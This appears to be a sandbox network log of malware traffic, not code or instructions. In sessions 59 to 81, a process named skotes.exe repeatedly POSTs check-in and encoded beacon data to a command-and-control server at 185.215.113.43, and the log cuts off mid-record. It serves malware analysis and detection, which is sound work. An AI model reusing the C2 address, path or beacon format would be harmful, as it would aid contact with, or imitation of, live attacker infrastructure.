Dec 13, 2024 18:56:08.289546013 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 13, 2024 18:56:09.623012066 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 13 Dec 2024 17:56:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
59	192.168.2.7	50173	185.215.113.43	80	8028	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 18:56:11.248848915 CET	316	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 35 32 38 37 37 42 30 35 46 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB52877B05F82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Dec 13, 2024 18:56:12.611283064 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 13 Dec 2024 17:56:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
60	192.168.2.7	50182	185.215.113.43	80	8028	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 18:56:14.351365089 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 13, 2024 18:56:15.800079107 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 13 Dec 2024 17:56:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
61	192.168.2.7	50183	185.215.113.43	80	8028	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 18:56:17.291816950 CET	316	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 35 32 38 37 37 42 30 35 46 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB52877B05F82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Dec 13, 2024 18:56:18.754188061 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 13 Dec 2024 17:56:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
62	192.168.2.7	50184	185.215.113.43	80	8028	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 18:56:20.493998051 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 13, 2024 18:56:22.042722940 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 13 Dec 2024 17:56:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
63	192.168.2.7	50185	185.215.113.43	80	8028	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 18:56:23.671113968 CET	316	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 35 32 38 37 37 42 30 35 46 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB52877B05F82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Dec 13, 2024 18:56:25.050224066 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 13 Dec 2024 17:56:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
64	192.168.2.7	50186	185.215.113.43	80	8028	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 18:56:26.788897991 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 13, 2024 18:56:28.140178919 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 13 Dec 2024 17:56:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
65	192.168.2.7	50187	185.215.113.43	80	8028	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 18:56:29.786147118 CET	316	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 35 32 38 37 37 42 30 35 46 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB52877B05F82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Dec 13, 2024 18:56:31.271308899 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 13 Dec 2024 17:56:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
66	192.168.2.7	50188	185.215.113.43	80	8028	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 18:56:33.020746946 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 13, 2024 18:56:34.359291077 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 13 Dec 2024 17:56:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
67	192.168.2.7	50190	185.215.113.43	80	8028	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 18:56:35.997605085 CET	316	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 35 32 38 37 37 42 30 35 46 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB52877B05F82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Dec 13, 2024 18:56:37.372616053 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 13 Dec 2024 17:56:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
68	192.168.2.7	50191	185.215.113.43	80	8028	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 18:56:39.116055012 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 13, 2024 18:56:40.472455978 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 13 Dec 2024 17:56:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
69	192.168.2.7	50192	185.215.113.43	80	8028	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 18:56:42.108975887 CET	316	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 35 32 38 37 37 42 30 35 46 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB52877B05F82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Dec 13, 2024 18:56:43.464474916 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 13 Dec 2024 17:56:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
70	192.168.2.7	50193	185.215.113.43	80	8028	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 18:56:45.205727100 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 13, 2024 18:56:46.555383921 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 13 Dec 2024 17:56:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
71	192.168.2.7	50194	185.215.113.43	80	8028	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 18:56:48.181878090 CET	316	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 35 32 38 37 37 42 30 35 46 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB52877B05F82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Dec 13, 2024 18:56:49.612288952 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 13 Dec 2024 17:56:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
72	192.168.2.7	50195	185.215.113.43	80	8028	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 18:56:51.357928038 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 13, 2024 18:56:52.712762117 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 13 Dec 2024 17:56:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
73	192.168.2.7	50196	185.215.113.43	80	8028	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 18:56:54.355638981 CET	316	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 35 32 38 37 37 42 30 35 46 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB52877B05F82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Dec 13, 2024 18:56:55.727401972 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 13 Dec 2024 17:56:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
74	192.168.2.7	50197	185.215.113.43	80	8028	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 18:56:57.481695890 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 13, 2024 18:56:58.820270061 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 13 Dec 2024 17:56:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
75	192.168.2.7	50198	185.215.113.43	80	8028	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 18:57:00.450953007 CET	316	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 35 32 38 37 37 42 30 35 46 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB52877B05F82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Dec 13, 2024 18:57:01.808079958 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 13 Dec 2024 17:57:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
76	192.168.2.7	50199	185.215.113.43	80	8028	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 18:57:03.546777964 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 13, 2024 18:57:04.895026922 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 13 Dec 2024 17:57:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
77	192.168.2.7	50200	185.215.113.43	80	8028	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 18:57:06.523797035 CET	316	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 35 32 38 37 37 42 30 35 46 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB52877B05F82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Dec 13, 2024 18:57:07.871380091 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 13 Dec 2024 17:57:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
78	192.168.2.7	50201	185.215.113.43	80	8028	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 18:57:09.834714890 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 13, 2024 18:57:11.168245077 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 13 Dec 2024 17:57:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
79	192.168.2.7	50203	185.215.113.43	80	8028	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 18:57:12.990343094 CET	316	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 35 32 38 37 37 42 30 35 46 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB52877B05F82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Dec 13, 2024 18:57:14.341336012 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 13 Dec 2024 17:57:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
80	192.168.2.7	50204	185.215.113.43	80	8028	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 18:57:16.083710909 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 13, 2024 18:57:17.448569059 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 13 Dec 2024 17:57:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
81	192.168.2.7	50205	185.215.113.43	80	8028	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
